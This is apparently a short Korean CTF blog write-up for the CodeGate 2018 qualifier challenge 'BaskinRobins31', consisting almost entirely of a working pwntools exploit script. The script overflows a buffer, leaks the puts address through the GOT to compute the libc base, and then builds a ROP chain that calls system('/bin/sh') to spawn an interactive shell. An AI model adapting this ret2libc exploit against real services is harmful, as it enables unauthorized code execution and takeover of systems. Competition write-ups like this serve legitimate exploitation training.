ROP로 쉘 겟!
solve.py:
1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18 19 20 21 22 23 24 25 26 27 | from pwn import * context.arch="amd64" elf=ELF("./BaskinRobins31") libc= ELF("./libc.so.6.txt") p=process("./BaskinRobins31") #p=remote("ch41l3ng3s.codegate.kr", 3131) pr=0x400bc2 ppr=0x400bc0 pdr = next(elf.search(asm("pop rdi; ret"))) print p.recv() p.sendline("A"*0xb8+flat(pdr, elf.got['puts'], elf.plt['puts'], 0x400a4b )) print p.recvuntil("Don't break the rules...:( \n") puts= u64(p.recv(6).ljust(8,"\x00")) libc.address = puts - libc.symbols['puts'] print p.recv() p.sendline("A"*0xb8+flat(pdr, next(libc.search("/bin/sh\x00")), libc.symbols['system'], 0x400a4b )) p.interactive() | cs |
'CTF' 카테고리의 다른 글
| CodeGate 2018 quals SuperFTP (0) | 2018.02.07 |
|---|---|
| CodeGate 2018 quals SuperMarimo (2) | 2018.02.07 |
| SCTF 2017 본썬 후기 (0) | 2017.08.23 |
| YISF 2017 본선 후기 (0) | 2017.08.14 |
| YISF 2017 예선 Write up (0) | 2017.08.14 |